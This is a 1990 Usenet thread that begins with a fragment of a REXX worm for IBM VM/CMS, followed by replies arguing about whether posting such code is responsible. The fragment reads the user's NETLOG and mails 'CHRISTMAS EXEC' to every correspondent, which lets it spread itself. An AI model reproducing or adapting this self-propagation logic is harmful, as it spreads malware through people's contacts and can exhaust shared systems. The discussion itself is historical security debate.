   NAM = INDEX(ORT,'.')+1
   IF NAM >0 THEN DO
       ORT=SUBSTR(ORT,NAM)
       END
   IF LENGTH(NAME)>0 THEN DO
        ORT=WHERE
        END
        if name ^="RELAY" then do
           "SF CHRISTMAS EXEC A " NAME " AT " ORT " (ack"
            end
        END
   END
DROPBUF
MAKEBUF
AMT=1

"EXECIO * DISKR " WHO " NETLOG A (FIFO"
DO WHILE QUEUED()>0
   PULL KIND FN FT FM ACT FROM ID AT NODE REMAINING
   IF ACT='SENT' THEN DO
       IF AMT=1 THEN DO
         OK.AMT=ID
         END
       IF AMT>1 THEN DO
         OK.AMT=ID
         NIXIS=0
         DO I=1 TO AMT-1
             IF OK.I=ID THEN DO
                  NIXIS=1
                  END
             END
         END
       AMT=AMT+1
       IF NIXIS=0 THEN DO
         "SF CHRISTMAS EXEC A " ID " AT " NODE " (ack"
          END
    END
END
DROPBUF
END
end
end

g7ahn@cc.imperial.ac.UK (Costas Krallis G7AHN) (09/13/90)

It looks like IBM JCL to me. Unfortunately our departmental
IBM 4341 running VM/CMS is not networked. :-)

Costas Krallis  G7AHN
London, UK

spl@cs.nps.navy.mil (Steve Lamont) (09/13/90)

In article <9009122126.aa05627@mvax.cc.ic.ac.uk> g7ahn@cc.imperial.ac.uk writes:
>It looks like IBM JCL to me. Unfortunately our departmental
>IBM 4341 running VM/CMS is not networked. :-)

Close.  It's REXX, one of IBM's VM/CMS EXEC language.

Fie on spreaders of stuff like this.

							spl (the p stands for
							pits of hell are too
							good for them...)
--
Steve Lamont, SciViGuy -- (408) 646-2752 (subject to change at random)
NPS Confuser Center / Code 51 / Naval Postgraduate School / Monterey, CA 93940

abc@Matrix.COM (Alan Clegg) (09/13/90)

In article <1411@cs.nps.navy.mil> spl@cs.nps.navy.mil (Steve Lamont) writes:
>In article <9009122126.aa05627@mvax.cc.ic.ac.uk> g7ahn@cc.imperial.ac.uk writes:
>>It looks like IBM JCL to me. Unfortunately our departmental
>>IBM 4341 running VM/CMS is not networked. :-)
>
>Close.  It's REXX, one of IBM's VM/CMS EXEC language.
>
>Fie on spreaders of stuff like this.

Nix on Fie.  If you think people couldn't write things like this without seeing
it, you must be mistaken.  This is the MOST SIMPLISTIC hack ever.

If you are going to post something, post something that the average LUSER could
NOT do.  8-)  (or not).

>							spl (the p stands for
>							pits of hell are too
>							good for them...)

							^^^^^^^^^^^^^^^^^^^^^^
I guess this means that "SECURITY BY OBSCURITY" is the way to go, huh?

The fact that Unix World (or some such) published the base of the Internet
worm, and that you can PURCHASE the REAL SOURCE to the worm from some hacker
magazine means that they too should burn?

Gee, I guess Gene Spafford should not have published his paper on the worm...
might give me some ideas...

NAH.....
--
Alan B. Clegg				uucp:  ...!mcnc!matrx!abc
Matrix Corporation			inet: abc@matrix.com

spl@cs.nps.navy.mil (Steve Lamont) (09/14/90)

In article <1990Sep13.145046.7262@Matrix.COM> /dev/null writes:
>Nix on Fie.  If you think people couldn't write things like this without seeing
>it, you must be mistaken.  This is the MOST SIMPLISTIC hack ever.
>
>If you are going to post something, post something that the average LUSER could
>NOT do.  8-)  (or not).

You misunderstand my reply.  I would just rather that things like this not be
spread around.  We have a VM/CMS system and some moron here is likely to try
it out without understanding what they're doing.

We had one joker pull a similar stunt and crash the system when it ran out of
spool space.

>I guess this means that "SECURITY BY OBSCURITY" is the way to go, huh?
>
>The fact that Unix World (or some such) published the base of the Internet
>worm, and that you can PURCHASE the REAL SOURCE to the worm from some hacker
>magazine means that they too should burn?
>
>Gee, I guess Gene Spafford should not have published his paper on the worm...
>might give me some ideas...
>
>NAH.....

Sorry, but I guess I didn't make myself terribly clear.  I am not opposed to
discussing security matters.  The original posting was *not* a discussion of
this rather simplistic "worm," though.  It was simply the worm itself, with no
commentary, analysis, or discussion whatever.  In the text of the code was the
admonition "don't waste your time reading this, just run it" or words to that
effect.

I'll be happy to discuss the structure of this piece of junk in any open
forum.  I'll even explain to the non-REXX literate how it works and suggest
ways of making it more obtuse with a liberal sprinkling of "Interpret"
instructions to obscure some of the more obvious parts of it, if you wish.

If anyone believed that I was criticising the follow up poster (and I can, in
retrospect, see how that interpretation might be honestly made), I assure them
that this was not my intention.  Just another reminder that in this
essentially written medium, one must be conscious that readers will naturally
interpret words in different ways.

							spl (the p stands for
							pink, as in blushing.)